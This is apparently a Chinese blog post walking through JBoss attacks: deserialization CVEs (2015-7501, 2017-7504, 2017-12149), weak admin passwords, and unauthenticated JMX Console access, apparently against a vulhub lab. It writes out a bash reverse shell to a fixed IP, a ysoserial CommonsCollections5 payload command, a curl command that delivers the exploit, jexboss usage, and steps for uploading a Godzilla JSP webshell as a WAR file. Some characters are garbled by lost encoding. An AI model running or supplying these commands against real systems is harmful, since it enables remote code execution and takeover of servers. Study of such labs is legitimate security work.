当前位置: 首页 > news >正文

Jboss中间件漏洞攻略

news 来源:原创 2025/5/18 22:02:39

CVE-2015-7501

Jboss JMXInvokerServlet 反序列化漏洞,这是典的JBoss反序列化漏洞JBoss/invoker/JMXInvokerServlet读取户传⼊的对我们利用Apache Commons Collections   Gadget 任意代

 访问地址 http://39.105.61.160:8080/invoker/JMXInvokerServlet1.返回如下,说明接⼝开放,此接⼝存在反序列化漏洞

 下载 ysoserial ⼯具进⾏漏洞利⽤

https://github.com/frohoff/ysoserial

 将反弹shell进⾏base64编码

bash -i >& /dev/tcp/39.105.61.160/6666 0>&1

 监听6666端口

使用cmd

 java -jar "C:\Users\23215.呵呵\Documents\WeChat Files\wxid_1jxr0075qqd422\FileStorage\File\2025-03\ysoserial-all.jar" CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zOS4xMDUuNjEuMTYwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}">exp.ser

执行后在当前目录会生成一个exp.ser

再使用curl http://39.105.61.160:8080/invoker/JMXInvokerServlet --data-binary @exp.ser,那么就可以成功监听到端口

CVE-2017-7504

JBossMQ JMS 序列化漏洞,JBoss AS 4.x之前版本中JbossMQJMS over HTTP Invocation LayerHTTPServerILServlet.java序列化漏洞者可借助特制的序列化数据漏洞执任意代码执

访问漏洞地址,出现此页面说明存在漏洞

http://39.105.61.160:8080/jbossmq-httpil/HTTPServerILServlet

 在kali中使用jexboss工具

python3 jexboss.py -u http://39.105.61.160:8080

 

拿到shell 

​​​​​​​CVE-2017-12149

JBoss 5.x/6.x序列化漏洞,该漏洞为 Java序列化错在于 Jboss  HttpInvoker 件中的 ReadOnlyAccessFilter滤器中过滤器在没有进任何查的情况尝试将⾃客数据流进⾏反序列化⽽导了漏洞

使用jboss反序列化_CVE-2017-12149.jar

 ​​​​​​​Administration Console

Administration Console⻚⾯存在弱`admin:admin`陆后台war , getshell

 访问漏洞⻚⾯,出现404则存在漏洞

http://39.105.61.160:8080/invoker/readonly

点击Administration console

 使用弱口令登录,admin;vulhub

 点击Web Application (WAR)->Add New Web Application (WAR)

使用哥斯拉生成jsp木马,写入shell.jsp,压缩为shell.zip,将名字改为shell.war 

上传后通过http://39.105.61.160:8080/shell/shell.jsp访问,可使用哥斯拉连接就可以了

​​​​​​​低版本JMX  Console未授

JMX Console未授权访问Getshell,此漏洞JBoss/jmx-console/HtmlAdaptor路径对开放有任何身份致攻以进⼊到   jmx并在中执任何

点击JMX Console

使用弱口令登录,admin;admin

 

 登陆后找到jboss.deployment

 点击flavor=URL后找到void addURL(),第一个

将shell.war放到服务器上

 http://39.105.61.160/shell.war

点击Invoke, 出现下图代表成功

使用http://39.105.61.160/shell/shell.jsp就能访问到,之后使用哥斯拉连接 

版本JMX  Console未授

JMX Console访接点JBoss  JMX Console 接进JMX Console⻚⾯, 通过部war, getshell

点击JMX Console,账号admin;vulhub

 登陆后点击jboss.system->service=MainDeployer

 找到deloy部署http://39.105.61.160/shell.war,点击Invoke

使用http://39.105.61.160/shell/shell.jsp就能访问到,之后使用哥斯拉连接 

相关文章:

  • java学习笔记6
  • 【云馨AI-大模型】大模型的开发和应用中,Python、PyTorch和vLLM关系概括
  • 从扩展黎曼泽塔函数构造物质和时空的结构-1
  • netty框架概述
  • 蓝桥云客 合并数列
  • 01、聊天与语言模型
  • [python]IsaacGym安装
  • 多线程编程
  • Android应用退出后不在任务栏显示
  • 如何做好需求管理培训
  • Rk3588,Opencv读取Gmsl相机,Rga yuv422转换rgb (降低CPU使用率)
  • 2.1.1~2词法分析的手工构造
  • 判断一个操作是不是允许
  • 3.23学习总结
  • 运筹优化梳理
  • [M模拟] lc2116. 判断一个括号字符串是否有效(思维+括号匹配问题+问题分析+代码实现)
  • 交换机远程登录
  • 基于Python的智慧金融风控系统的设计与实现
  • 银河麒麟桌面版包管理器(五)
  • 计算机操作系统(五) 前趋图和程序执行与进程的描述(附带图谱表格更好对比理解))
  • 山东发布高温橙警:预计19日至21日局地可达40℃
  • 摄影师|伊莎贝尔·穆尼奥斯:沿着身体进行文化溯源
  • 陶石不语,玉见文明:临平玉架山考古博物馆明日开馆
  • 机器人为啥热衷“搞体育”,经济日报:是向加速融入日常生活发起的冲锋
  • 北方将现今年首场大范围高温天气,山西河南山东陕西局地可超40℃
  • 雷军内部演讲回应质疑:在不服输、打不倒方面,没人比我们更有耐心